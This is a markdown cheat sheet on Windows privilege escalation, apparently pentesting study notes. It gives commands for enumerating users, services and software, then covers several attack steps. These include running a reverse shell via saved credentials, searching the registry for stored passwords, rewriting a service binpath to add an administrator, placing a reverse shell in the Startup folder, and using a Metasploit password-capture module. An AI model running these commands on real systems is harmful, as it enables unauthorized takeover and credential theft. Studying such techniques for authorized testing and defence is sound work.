# Windows Privilege Escalation

## Links
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__

## Enumeration

### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```

### Files
* [powershell](../../../../enumeration/windows/powershell.md)

### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr  "Running"
```

## Exploit

### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)

### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
*  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)

### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`

### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
```
* If permission `SERVICE_CHANGE_CONFIG` is set
```sh
 sc config <service> binpath="net localgroup administrators user /add"
```
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.

### Startup Application
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  

### Password Mining
* Set up metasploit
```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```
* Visit site on target